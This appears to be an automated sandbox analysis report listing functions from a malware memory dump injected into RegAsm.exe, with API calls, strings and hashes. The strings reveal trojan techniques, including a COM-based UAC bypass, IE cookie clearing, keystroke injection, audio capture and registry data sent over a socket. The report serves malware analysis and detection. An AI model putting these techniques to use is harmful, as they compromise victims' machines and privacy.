                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                              • _free.LIBCMT ref: 00445515
                                                                                              • _free.LIBCMT ref: 0044552E
                                                                                              • _free.LIBCMT ref: 00445560
                                                                                              • _free.LIBCMT ref: 00445569
                                                                                              • _free.LIBCMT ref: 00445575
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                              • String ID: C
                                                                                              • API String ID: 1679612858-1037565863
                                                                                              • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                              • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                              • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                              • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                              Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: tcp$udp
                                                                                              • API String ID: 0-3725065008
                                                                                              • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                              • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                              • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                              • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                              Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                              • ExitThread.KERNEL32 ref: 004018F6
                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                              • String ID: PkG$XMG$NG$NG
                                                                                              • API String ID: 1649129571-3151166067
                                                                                              • Opcode ID: 35ae0a798540fc07e5cea5f4fbc263e41328c5057d864c05e2b4a65f83a90283
                                                                                              • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                              • Opcode Fuzzy Hash: 35ae0a798540fc07e5cea5f4fbc263e41328c5057d864c05e2b4a65f83a90283
                                                                                              • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                              Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                              • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                              • String ID: .part
                                                                                              • API String ID: 1303771098-3499674018
                                                                                              • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                              • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                              • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                              • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                              Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendInput.USER32 ref: 00419A25
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                              • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                              • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InputSend$Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 1167301434-0
                                                                                              • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                              • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                              • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                              • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                              Function 004475F1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16_free
                                                                                              • String ID: a/p$am/pm$h{D
                                                                                              • API String ID: 2936374016-2303565833
                                                                                              • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                              • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                              • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                              • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                              Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • _free.LIBCMT ref: 00444E87
                                                                                              • _free.LIBCMT ref: 00444E9E
                                                                                              • _free.LIBCMT ref: 00444EBD
                                                                                              • _free.LIBCMT ref: 00444ED8
                                                                                              • _free.LIBCMT ref: 00444EEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$AllocateHeap
                                                                                              • String ID: KED
                                                                                              • API String ID: 3033488037-2133951994
                                                                                              • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                              • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                              • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                              • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                              Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Enum$InfoQueryValue
                                                                                              • String ID: [regsplt]$xUG$TG
                                                                                              • API String ID: 3554306468-1165877943
                                                                                              • Opcode ID: 2c4c7960f398d5670c8e042d3f595383af7e698597d1ec90680a8653f7925ed4
                                                                                              • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                              • Opcode Fuzzy Hash: 2c4c7960f398d5670c8e042d3f595383af7e698597d1ec90680a8653f7925ed4
                                                                                              • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                              Function 0044B43C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                              • __fassign.LIBCMT ref: 0044B4F9
                                                                                              • __fassign.LIBCMT ref: 0044B514
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                              • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                              • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                              • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                              Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                              • String ID: xUG$NG$NG$TG
                                                                                              • API String ID: 3114080316-2811732169
                                                                                              • Opcode ID: 0c63b4f5c7af4816e34e5005ad0f8b74639ac255fa43b6525b93048f0c761f74
                                                                                              • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                              • Opcode Fuzzy Hash: 0c63b4f5c7af4816e34e5005ad0f8b74639ac255fa43b6525b93048f0c761f74
                                                                                              • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                              Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                              • _wcslen.LIBCMT ref: 0041B7F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                              • API String ID: 37874593-122982132
                                                                                              • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                              • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                              • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                              • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                              Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                              • API String ID: 1133728706-4073444585
                                                                                              • Opcode ID: b9c60e82bbbca7737c419c9b7d33d4a319c1a0651c494f32b3451364f95243c4
                                                                                              • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                              • Opcode Fuzzy Hash: b9c60e82bbbca7737c419c9b7d33d4a319c1a0651c494f32b3451364f95243c4
                                                                                              • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                              Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                              • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                              • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                              • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                              Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                              Strings
                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                              • API String ID: 3121278467-91888290
                                                                                              • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                                              • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                              • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                                              • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                              Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreatePointerWrite
                                                                                              • String ID: xpF
                                                                                              • API String ID: 1852769593-354647465
                                                                                              • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                              • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                              • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                              • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                              Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                              • _free.LIBCMT ref: 00450FC8
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00450FD3
                                                                                              • _free.LIBCMT ref: 00450FDE
                                                                                              • _free.LIBCMT ref: 00451032
                                                                                              • _free.LIBCMT ref: 0045103D
                                                                                              • _free.LIBCMT ref: 00451048
                                                                                              • _free.LIBCMT ref: 00451053
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                              • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                              • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                              Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                              • int.LIBCPMT ref: 004111BE
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                              • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                              • String ID: (mG
                                                                                              • API String ID: 2536120697-4059303827
                                                                                              • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                              • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                              • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                              • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                              Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                              • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                              • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                              • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                              • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                              Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                              • CoUninitialize.OLE32 ref: 00407664
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeObjectUninitialize_wcslen
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                              • API String ID: 3851391207-1839356972
                                                                                              • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                              • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                              • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                              • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
